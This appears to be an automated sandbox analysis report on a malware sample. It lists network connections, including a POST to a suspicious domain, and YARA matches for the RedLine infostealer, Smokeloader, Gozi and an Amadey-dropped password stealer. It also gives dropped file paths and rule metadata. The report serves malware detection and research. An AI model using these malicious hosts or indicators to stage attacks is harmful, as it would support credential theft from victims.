                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
                      Source: unknownHTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.206.73:443 -> 192.168.2.3:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.53:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.216.243.155:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49806 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
                      Source: Yara matchFile source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
                      Source: Yara matchFile source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: tiddsjj, 0000000B.00000002.378644024.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
                      Source: Yara matchFile source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040E054
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040AD62
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040F105
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeCode function: 0_2_0040DB10
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040E054
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040AD62
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040F105
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0040DB10
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B4130D
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00407D62
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_02526078
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_02526088
                      Source: C:\Windows\explorer.exeSection loaded: webio.dll
                      Source: S2XJ2wbz7u.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
